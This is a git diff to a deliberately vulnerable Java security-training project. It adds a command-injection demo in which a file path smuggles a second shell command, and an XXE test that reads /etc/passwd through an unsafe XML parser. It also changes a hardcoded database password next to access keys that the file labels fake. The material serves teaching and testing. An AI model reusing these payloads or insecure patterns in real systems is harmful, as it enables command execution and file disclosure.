diff --git a/java-sec-code.iml b/java-sec-code.iml
deleted file mode 100644
index 5c58c92b..00000000
--- a/java-sec-code.iml
+++ /dev/null
@@ -1,14 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<module version="4">
-  <component name="AdditionalModuleElements">
-    <content url="file://$MODULE_DIR$" dumb="true">
-      <sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
-      <sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
-    </content>
-  </component>
-  <component name="FacetManager">
-    <facet type="Spring" name="Spring">
-      <configuration />
-    </facet>
-  </component>
-</module>
\ No newline at end of file
diff --git a/src/main/java/org/joychou/cmd/testRun.java b/src/main/java/org/joychou/cmd/testRun.java
new file mode 100644
index 00000000..df861eb5
--- /dev/null
+++ b/src/main/java/org/joychou/cmd/testRun.java
@@ -0,0 +1,19 @@
+package org.joychou.cmd;
+
+import org.joychou.util.WebUtils;
+
+import java.io.IOException;
+
+public class testRun {
+    public static void main(String[] args) throws IOException {
+        String filepath = "/tmp; open /System/Applications/Calculator.app";
+        String[] cmdList = new String[]{"sh", "-c", "ls -la " + filepath};
+        //String[] cmdList = new String[]{"cmd.exe", "-c", "dir " + filepath};
+        ProcessBuilder builder = new ProcessBuilder(cmdList);
+        builder.redirectErrorStream(true);
+        Process process = builder.start();
+        String result = WebUtils.convertStreamToString(process.getInputStream());
+        System.out.println(result);
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/TestXXE.java b/src/main/java/org/joychou/controller/TestXXE.java
new file mode 100644
index 00000000..5773270d
--- /dev/null
+++ b/src/main/java/org/joychou/controller/TestXXE.java
@@ -0,0 +1,30 @@
+package org.joychou.controller;
+
+import org.dom4j.Document;
+import org.dom4j.Node;
+import org.dom4j.io.SAXReader;
+
+import java.io.StringReader;
+
+public class TestXXE {
+    public static void main(String[] args) {
+        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
+                "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>\n" +
+                "<kpserver>\n" +
+                "<Input>\n" +
+                "<Nsrsbh_JX>&xxe;</Nsrsbh_JX>\n" +
+                "<Machine>test</Machine>\n" +
+                "<InvoiceType>test</InvoiceType>\n" +
+                "</Input>\n" +
+                "</kpserver>";
+
+        try {
+            SAXReader reader = new SAXReader();
+            Document document = reader.read(new StringReader(xml));
+            Node node = document.selectSingleNode("//kpserver/Input/Nsrsbh_JX");
+            System.out.println(node.getText());
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 326a2b76..fd8897e8 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,7 @@
 
 spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
 spring.datasource.username=root
-spring.datasource.password=woshishujukumima
+spring.datasource.password=zzz@2160
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
 mybatis.mapper-locations=classpath:mapper/*.xml
 # mybatis SQL log
@@ -56,4 +56,4 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 
 # Fake aksk. Simulate actuator info leak.
 jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
-jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
+jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7